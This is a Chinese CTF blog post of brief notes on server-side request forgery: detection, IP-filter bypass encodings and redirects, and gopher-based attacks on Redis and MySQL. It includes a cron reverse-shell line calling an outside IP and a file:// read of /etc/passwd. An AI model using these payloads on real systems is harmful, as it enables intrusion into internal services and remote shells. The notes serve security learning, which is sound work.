ssrf介绍以及ip限制绕过以及gopher协议的利用
ctf
发布日期:   2019-11-16
阅读次数:  

ssrf的危害

ssrf漏洞的判断

回显

延迟

DNS请求

相关函数

file_get_content

image-20191028194701446

curl可以支持很多协议

curl -v可以查看curl支持的协议

也可以在phpinfo中查看支持的协议

ip限制绕过

添加端口:

短网址

指向任意ip的域名 :

ip地址限制绕过:

十进制 2130706433

八进制 0177.0.0.1

十六进制 ox7f.0.0.1 0x7f000001

不同进制的组合

302跳转

结合dict dict://120.0.0.1:3306

file://

gopher://协议

http://www.baidu.com@192.168.0.1

http://127.0.0.1?a=asdadsad

gopher协议

gopher对redis的利用

限制

redis 没有密码 cron 定时任务—》反弹shell 具有写权限

*/1****/bin/bash -i >& /dev/tcp/106.12.37.37/2333 0>&1

定时任务语法: 为什么有 回车》

逐行执行定时任务

先流量转发

gopher对mysql

mysql无密码:
登入数据库

查询数据:

请求的接口:

curl 绕过执行系统命令

php-curl ssrf file://127.0.0.1/etc/passwd

localhost

  转载请注明: 星晴 ssrf介绍以及ip限制绕过以及gopher协议的利用

 上一篇
ssrf漏洞 ssrf漏洞
SSRF漏洞 # 0x01 ssrf存在的地方 图片的加载和下载:通过url地址加载或者下载图片 从远程服务器请求资源 数据库内置功能(oracle,MongoDB,MSSQL,Postgres,CouchDB) webMail收取其他邮
2019-11-16 starjian
ctf
下一篇 
sql注入中的堆叠注入 sql注入中的堆叠注入
sql注入中的堆叠注入 堆叠注入:一堆sql语句一起执行,mysql中语句结尾添加;表示结束,多句一起使用,代码中和一般查询不同 的是使用了muiti_query函数 oxo1 判断堆叠注入存储过程:是一种在数据库中存储复杂程序,以便在外部
2019-11-16 starjian
ctf
  目录